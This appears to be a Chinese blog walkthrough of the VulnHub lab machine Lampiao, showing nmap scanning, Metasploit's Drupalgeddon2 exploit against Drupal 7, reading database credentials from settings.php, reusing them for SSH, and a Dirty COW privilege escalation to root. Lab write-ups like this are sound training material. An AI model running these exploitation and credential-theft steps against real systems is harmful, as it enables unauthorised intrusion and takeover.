VulnHub靶场之Lampiao
最近事情有点多,但是还是要抽出点时间来学习的!!!
老样子,Lampiao虚拟机先启动,然后再启动kali!!
Lampiao虚拟机启动如下,不知账户密码,估摸着和上次那个靶机是差不多的!!!
打开kali,使用命令查看kali的ip:
使用nmap进行主机扫描:nmap -sP 192.168.80.1/24
:
继续使用nmap扫描端口:nmap -p 1-65535 -sV 192.168.80.129
:
开放了,22端口和80端口,1898端口
22端口,尝试ssh弱口令爆破,没有结果,,,
这里就不多说ssh弱口令爆破了,基本上百度都能搜得到,使用msf
80端口也没有是没有用的信息
访问一下http://192.168.80.129:1898/
,这个页面我也没发现什么东西,,,,
ok,对该网站进行信息收集
先手动进行信息收集,发现存在robots.txt:
查看一下CHANGELOG.txt文件,发现网站的版本信息:
OK,再进行下一步,直接跑一下目录!!!
emmm,目录贼多,,,,再include里面看见有什么数据库的配置文件之类的
好像没什么卵用,毕竟PHP文件是看不见内容的
到此不知该如何,,,,
仔细想想还是有条路的,既然我们知道网站的搭建框架Drupal 7
那么我们可以直接使用百度搜索一下该搭建框架的漏洞:
找到一个CVE漏洞,,,,
既然有CVE漏洞编号,那就好办了,直接去kali上的msf进行search:
找到了,直接利用该漏洞:use exploit/unix/webapp/drupal_drupalgeddon2
然后show一下需要设置的参数
ok,需要我们设置端口和ip,直接设置:
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.80.129
RHOST => 192.168.80.129
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
RPORT => 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > run
成功拿到shell:
emmm,以写入文件的方式获取标准shell失败:
换一种方法:python -c 'import pty; pty.spawn("/bin/bash")'
,成功:
发现是www-data用户,这说明需要我们进行提权!!
同时,也发现了许多没有扫描出来的文件
打开qrc.png发现是 一个二维码,扫出来的结果是 Try harger! muahuahuahua:
打开audio.m4a,无语什么都没有:
打开LuizGonzaga-LampiaoFalou.mp3,一段2分多钟的mp3,感觉没有什么东西
打开lampiao.jpg,是一张图片,好像也什么都没有
emmm,没啥提示啊,查找用户名:cd /home | ls -l
:
找到了用户名,但是我们不知道密码怎么办,,,不慌,一般网站有数据库的配置文件
继续翻找配置信息,,,,在/var/www/html/sites/default/settings.php
中找到了配置信息!!
'username' => 'drupaluser'
'password' => 'Virgulino'
登录数据库看看:
在drupal数据库中有user表,第一个用户就是tiago,密码貌似也不是md5加密,不知道了,,,
后面不知道怎么办,查看大佬博客才知道,可以直接使用数据库的密码进行ssh登录,,,,
输入命令:ssh [email protected]
,密码就是:Virgulino
,成功登入:
那么接下来应该就是提权了,,,,
用uname -a 查看一下内核版本,16年的:
搜索一下漏洞,找到脏牛提权(CVE-2016-5195)
使用命令:cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~
,copy到当前目录:
然后在靶机上创建目录文件,写入到文件中:
(emmm,1.cpp编译时出错,直接在重新创建一个文件40847.cpp)
然后编译运行:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
参数解释:
1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
4. -std=c++11就是用按C++2011标准来编译的
5. -pthread 在Linux中要用到多线程时,需要链接pthread库
6. -o dcow gcc生成的目标文件,名字为dcow
执行文件,输入命令:./40847
,得到root密码!!!
使用ssh连接:ssh [email protected]
输入密码:dirtyCowFun
,成功提权!!:
成功get到flag:
总结:
这个靶场还是学到了很多的东西,比如说如何一步一步进行渗透,
虽说与真实的环境相差甚远,但是最主要了还是用来锻炼自己的能力,
在本篇的实验中还是存在很多的不足的!还是要靠百度来进行一步一步的探索
主要还是自己的知识面太窄了,比如说这个脏牛提权,我就不知道
看来以后还是要多扩大自己的知识面,前面的都还行,遇上一个实验差不多,
到了提权这一步就开始花里胡哨,自己就很懵比,就很难受!!!!
还是要多学习啊~~